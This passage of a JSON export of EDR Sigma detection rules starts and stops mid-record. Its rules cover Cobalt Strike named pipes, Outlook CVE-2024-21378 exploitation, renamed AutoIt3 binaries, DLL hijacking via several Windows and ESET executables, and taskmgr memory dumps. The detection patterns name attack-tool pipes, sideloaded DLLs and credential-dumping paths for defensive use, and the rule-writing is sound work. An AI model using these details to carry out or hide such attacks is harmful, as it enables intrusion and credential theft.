"https://www.vanimpe.eu/2021/09/12/cobalt-strike-hunting-key-items-to-look-for/"
],
"name": "t1021_002_default_cobaltstrike_named_pipes_connection.yml",
"content": "title: Default CobaltStrike Named Pipe Connected\nid: bb1c58fe-1301-4caf-8ca8-6fef9d1f7b5d\ndescription: |\n Detects the connection to a named pipe pertaining to the CobaltStrike framework.\n CobaltStrike uses Named Pipes mainly to follow its deployment status and to self-replicate using SMB.\n It is recommended to isolate infected hosts and to start incident response to determine the origin of the CobaltStrike beacon.\nreferences:\n - https://www.cobaltstrike.com/blog/learn-pipe-fitting-for-all-of-your-offense-projects/\n - https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575\n - https://www.vanimpe.eu/2021/09/12/cobalt-strike-hunting-key-items-to-look-for/\ndate: 2022/07/08\nmodified: 2025/03/06\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.002\n - attack.execution\n - attack.t1559\n - classification.Windows.Source.NamedPipe\n - classification.Windows.Framework.CobaltStrike\n - classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n category: named_pipe_creation\ndetection:\n selection_utilities:\n PipeName|endswith:\n # Cobalt Strike [3.x - 4.2]\n - '\\sshagent'\n - '\\portscan'\n - '\\keylogger'\n - '\\netview'\n - '\\screenshot'\n\n selection_msse:\n # Default cobalt are usually in the MSSE-???-server form\n # but have also been spotted with a smaller or higher number\n # of random chars, better make it generic to be sure\n PipeName|endswith: '\\MSSE-*-server'\n\n selection_other:\n # Startswith here allows to match all prefixes\n PipeName|startswith:\n - '\\msagent_'\n - '\\status_'\n - '\\postex_ssh_'\n - '\\postex_'\n - '\\interprocess_'\n - '\\samr_'\n - '\\netlogon_'\n - '\\srvsvc_'\n - '\\lsarpc_'\n\n condition: 1 of selection_*\nlevel: high\n# level: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bb1c58fe-1301-4caf-8ca8-6fef9d1f7b5d",
"rule_name": "Default CobaltStrike Named Pipe Connected",
"rule_description": "Detects the connection to a named pipe pertaining to the CobaltStrike framework.\nCobaltStrike uses Named Pipes mainly to follow its deployment status and to self-replicate using SMB.\nIt is recommended to isolate infected hosts and to start incident response to determine the origin of the CobaltStrike beacon.\n",
"rule_creation_date": "2022-07-08",
"rule_modified_date": "2025-03-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.002",
"attack.t1559"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bb218777-cf21-46e8-b489-ccda4ed23906",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083206Z",
"creation_date": "2026-03-23T11:45:34.083208Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083213Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.netspi.com/blog/technical/red-team-operations/microsoft-outlook-remote-code-execution-cve-2024-21378/"
],
"name": "cve_2024_21378_outlook.yml",
"content": "title: Outlook CVE-2024-21378 Vulnerability Exploited\nid: bb218777-cf21-46e8-b489-ccda4ed23906\ndescription: |\n Detects a registry value related to exploitation of CVE-2024-21378 set by Outlook.\n In order to exploit the vulnerability, adversaries must create a custom Outlook form that creates a new COM object in the registry.\n It is recommended to check the legitimacy of the DLL that is specified in the registry data.\nreferences:\n - https://www.netspi.com/blog/technical/red-team-operations/microsoft-outlook-remote-code-execution-cve-2024-21378/\ndate: 2024/03/12\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204.002\n - attack.privilege_escalation\n - attack.t1068\n - attack.defense_evasion\n - attack.t1112\n - cve.2024-21378\n - classification.Windows.Source.Registry\n - classification.Windows.Exploit.Outlook\n - classification.Windows.Exploit.CVE-2024-21378\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_write:\n EventType: 'SetValue'\n\n selection_outlook:\n TargetObject|endswith: '\\CLSID\\\\*\\InprocServer32\\(Default)'\n ProcessImage|endswith: '\\Outlook.exe'\n\n exclusion_binary_data:\n Details: 'Binary Data'\n\n exclusion_shdocvw:\n Details|endswith: # some details start with a space\n - '%SystemRoot%\\system32\\shdocvw.dll'\n - '%SystemRoot%\\SysWow64\\shdocvw.dll'\n\n exclusion_shell32:\n Details|endswith: # some details start with a space\n - '%SYSTEMROOT%\\system32\\shell32.dll'\n - '%SYSTEMROOT%\\syswow64\\shell32.dll'\n\n exclusion_teams:\n Details:\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\TeamsMeetingAdd-in\\\\*\\x86\\Microsoft.Teams.AddinLoader.dll'\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\TeamsMeetingAdd-in\\\\*\\x64\\Microsoft.Teams.AddinLoader.dll'\n\n exclusion_hp:\n TargetObject|endswith: '\\CLSID\\{B286F068-5B17-4AE8-989B-8F9A199C47BA}\\InprocServer32\\(Default)'\n Details: '?:\\Windows\\system32\\spool\\DRIVERS\\x64\\3\\hpcdmc64.DLL'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\n# level: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bb218777-cf21-46e8-b489-ccda4ed23906",
"rule_name": "Outlook CVE-2024-21378 Vulnerability Exploited",
"rule_description": "Detects a registry value related to exploitation of CVE-2024-21378 set by Outlook.\nIn order to exploit the vulnerability, adversaries must create a custom Outlook form that creates a new COM object in the registry.\nIt is recommended to check the legitimacy of the DLL that is specified in the registry data.\n",
"rule_creation_date": "2024-03-12",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1068",
"attack.t1112",
"attack.t1204.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bb54404b-0e9c-4feb-b2e2-a874ac1d817a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.606994Z",
"creation_date": "2026-03-23T11:45:34.606997Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.607005Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://fr.darktrace.com/blog/growing-your-onion-autoit-malware-in-the-darktrace-kill-chain",
"https://attack.mitre.org/techniques/T1059/010/"
],
"name": "t1059_010_suspicious_autoit3_executable.yml",
"content": "title: Suspicious AutoIt3 Binary Executed\nid: bb54404b-0e9c-4feb-b2e2-a874ac1d817a\ndescription: |\n Detects the suspicious execution of a renamed AutoIt3 executable or an AutoIt3 executable launched from an uncommon folder.\n Adversaries may try to hide malicious AutoIt script execution by masquerading the interpreter as another executable.\n It is recommended to check any children of this process and the activities of the parent for other malicious behavior.\nreferences:\n - https://fr.darktrace.com/blog/growing-your-onion-autoit-malware-in-the-darktrace-kill-chain\n - https://attack.mitre.org/techniques/T1059/010/\ndate: 2024/05/13\nmodified: 2025/02/07\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.010\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection_binary:\n OriginalFileName: 'AutoIt3.exe'\n\n selection_directory:\n CurrentDirectory|startswith: '?:\\Users\\\\*\\AppData\\'\n\n filter_legitimate:\n Image|endswith:\n - '\\AutoIt3.exe'\n - '\\AutoIt3_x64.exe'\n\n # Alor Oplus\n exclusion_alor:\n CommandLine: '.\\install.exe install_pdf.au3'\n ParentImage|endswith: '\\install_pdf.exe'\n\n condition: ((selection_binary and not filter_legitimate) or all of selection_*) and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bb54404b-0e9c-4feb-b2e2-a874ac1d817a",
"rule_name": "Suspicious AutoIt3 Binary Executed",
"rule_description": "Detects the suspicious execution of a renamed AutoIt3 executable or an AutoIt3 executable launched from an uncommon folder.\nAdversaries may try to hide malicious AutoIt script execution by masquerading the interpreter as another executable.\nIt is recommended to check any children of this process and the activities of the parent for other malicious behavior.\n",
"rule_creation_date": "2024-05-13",
"rule_modified_date": "2025-02-07",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.010"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bbd104fd-9499-44d2-8315-0480a5e955bf",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.096544Z",
"creation_date": "2026-03-23T11:45:34.096546Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.096550Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_fodhelper.yml",
"content": "title: DLL Hijacking via fodhelper.exe\nid: bbd104fd-9499-44d2-8315-0480a5e955bf\ndescription: |\n Detects potential Windows DLL Hijacking via fodhelper.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'fodhelper.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CRYPTBASE.DLL'\n - '\\edputil.dll'\n - '\\MLANG.dll'\n - '\\PROPSYS.dll'\n - '\\Secur32.dll'\n - '\\SSPICLI.DLL'\n - '\\WININET.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bbd104fd-9499-44d2-8315-0480a5e955bf",
"rule_name": "DLL Hijacking via fodhelper.exe",
"rule_description": "Detects potential Windows DLL Hijacking via fodhelper.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bbd3568d-604c-46d1-ac64-2e9eec0c9e01",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.601981Z",
"creation_date": "2026-03-23T11:45:34.601985Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.601992Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wpnpinst.yml",
"content": "title: DLL Hijacking via wpnpinst.exe\nid: bbd3568d-604c-46d1-ac64-2e9eec0c9e01\ndescription: |\n Detects potential Windows DLL Hijacking via wpnpinst.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wpnpinst.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\Cabinet.dll'\n - '\\IPHLPAPI.DLL'\n - '\\PROPSYS.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bbd3568d-604c-46d1-ac64-2e9eec0c9e01",
"rule_name": "DLL Hijacking via wpnpinst.exe",
"rule_description": "Detects potential Windows DLL Hijacking via wpnpinst.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bc503d34-1b44-4b9b-93a5-d6c4d21983f4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627966Z",
"creation_date": "2026-03-23T11:45:34.627968Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627973Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/",
"https://attack.mitre.org/techniques/T1003/"
],
"name": "t1003_memory_dump_with_taskmgr.yml",
"content": "title: Process Memory Dumped via taskmgr.exe\nid: bc503d34-1b44-4b9b-93a5-d6c4d21983f4\ndescription: |\n Detects a suspicious attempt to dump a process memory using taskmgr.\n Adversaries may attempt to access credential material stored in the process memory.\n These credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\n It is recommended to analyze other actions taken by the same user in its session to look for suspicious activities and to determine whether this user is legitimately connected to the host.\n It is also recommended to investigate the process that was dumped to determine whether it could have held valuable or sensitive information or credentials.\nreferences:\n - https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/\n - https://attack.mitre.org/techniques/T1003/\ndate: 2023/09/26\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.SensitiveInformation\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Image|endswith: '\\Taskmgr.exe'\n Path|endswith: '\\Temp\\\\*.DMP'\n\n # This is handled by the rule 78397a73-7ba5-4e02-8847-6a3242d29f28\n filter_lsass:\n Path|endswith: '\\lsass*.DMP'\n\n condition: selection and not 1 of filter_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bc503d34-1b44-4b9b-93a5-d6c4d21983f4",
"rule_name": "Process Memory Dumped via taskmgr.exe",
"rule_description": "Detects a suspicious attempt to dump a process memory using taskmgr.\nAdversaries may attempt to access credential material stored in the process memory.\nThese credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\nIt is recommended to analyze other actions taken by the same user in its session to look for suspicious activities and to determine whether this user is legitimately connected to the host.\nIt is also recommended to investigate the process that was dumped to determine whether it could have held valuable or sensitive information or credentials.\n",
"rule_creation_date": "2023-09-26",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bc513da5-13a0-445a-bd9a-6878834f9c18",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.594133Z",
"creation_date": "2026-03-23T11:45:34.594137Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.594144Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://unit42.paloaltonetworks.com/dll-hijacking-techniques/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_ehttpsrv.yml",
"content": "title: DLL Hijacking via EHttpSrv.exe\nid: bc513da5-13a0-445a-bd9a-6878834f9c18\ndescription: |\n Detects potential Windows DLL Hijacking via EHttpSrv.exe related to ESET HTTP Server service process.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://unit42.paloaltonetworks.com/dll-hijacking-techniques/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2024/03/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'EHttpSrv.exe'\n ImageLoaded|endswith: '\\http_dll.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\ESET\\'\n - '?:\\Program Files (x86)\\ESET\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\ESET\\'\n - '?:\\Program Files (x86)\\ESET\\'\n - '?:\\Windows\\System32\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'ESET, spol. s r.o.'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bc513da5-13a0-445a-bd9a-6878834f9c18",
"rule_name": "DLL Hijacking via EHttpSrv.exe",
"rule_description": "Detects potential Windows DLL Hijacking via EHttpSrv.exe related to ESET HTTP Server service process.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2024-03-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bc52849e-854e-46a1-af98-d7a3e7a81f20",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076812Z",
"creation_date": "2026-03-23T11:45:34.076814Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076818Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_appvclient.yml",
"content": "title: DLL Hijacking via AppVClient.exe\nid: bc52849e-854e-46a1-af98-d7a3e7a81f20\ndescription: |\n Detects potential Windows DLL Hijacking via AppVClient.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'AppVClient.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\appvpolicy.dll'\n - '\\netapi32.dll'\n - '\\secur32.dll'\n - '\\userenv.dll'\n - '\\wininet.dll'\n - '\\wtsapi32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bc52849e-854e-46a1-af98-d7a3e7a81f20",
"rule_name": "DLL Hijacking via AppVClient.exe",
"rule_description": "Detects potential Windows DLL Hijacking via AppVClient.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bc584877-b80e-43ee-93ae-a442c27df4bd",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
